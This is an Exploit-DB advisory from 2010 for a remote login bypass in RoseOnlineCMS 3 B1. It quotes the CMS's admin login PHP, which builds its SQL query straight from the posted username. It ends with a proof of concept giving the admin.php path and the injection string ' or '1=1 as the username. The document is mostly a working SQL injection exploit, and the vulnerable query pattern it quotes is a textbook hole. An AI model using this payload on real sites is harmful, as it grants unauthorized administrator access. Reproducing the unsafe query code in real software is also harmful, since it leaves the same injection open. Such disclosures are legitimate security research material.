RoseOnlineCMS <= 3 B1 - Remote Login Bypass Exploit

2010-01-16T00:00:00
ID EDB-ID:11158
Type exploitdb
Reporter cr4wl3r
Modified 2010-01-16T00:00:00

Description

RoseOnlineCMS <= 3 B1 Remote Login Bypass Exploit. Webapps exploit for php platform

                                        
                                                                        \#'#/
                            (-.-)
   --------------------oOO---(_)---OOo-------------------
   |  RoseOnlineCMS &lt;= 3 B1 Remote Login Bypass Exploit |
   |      (works only with magic_quotes_gpc = off)      |
   ------------------------------------------------------

[!] Discovered: cr4wl3r &lt;cr4wl3r[!]linuxmail.org&gt;
[!] Download: http://sourceforge.net/projects/rosecms/files/
[!] Date: 16.01.2010
[!] Remote: yes

[!] Code :


&lt;form action="&lt;?php $PHP_SELF; ?&gt;" method="post"&gt;

  &lt;div align="center"&gt;
    &lt;table width="295" border="0"&gt;
      &lt;tr&gt;
        &lt;td width="64"&gt;Username:&lt;/td&gt;
        &lt;td width="215"&gt;
          &lt;label&gt;
          &lt;input name="user" type="text" id="user"&gt;
          &lt;/label&gt;        &lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;Password:&lt;/td&gt;
        &lt;td&gt;          &lt;input name="pass" type="text" id="pass"&gt;        &lt;/td&gt;
      &lt;/tr&gt;
    &lt;/table&gt;
  &lt;/div&gt;
  &lt;p align="center"&gt;
    &lt;em&gt;
    &lt;input name="submit" type="submit" id="submit" value="Login"&gt;
    &lt;/em&gt;
&lt;/form&gt;
&lt;/p&gt;
&lt;?php
if(isset($_POST['submit'])) {


// username and password sent from signup form
$USER = $_POST['user'];
$PASS = md5($_POST['pass']);

$sql = "SELECT * FROM `accounts` WHERE username='$USER' and password='$PASS' and accesslevel = '300'";
$result = mysql_query($sql);

// Mysql_num_row is counting table row
$count = mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row

if($count == 1){
// Register $user, $pass and redirect to file ?op=admin
session_register("USER");
session_register("PASS");
echo('Logged in: &lt;a href=?op=admincp&gt;Click here&lt;/a&gt; to go to the control panel.');
}
else {
echo "You are banned, or you are an user with no permission to enter.";
}
}
?&gt;

[!] PoC: [RoseOnlineCMS_path]/modules/admin.php

    username : ' or '1=1
    password : cr4wl3r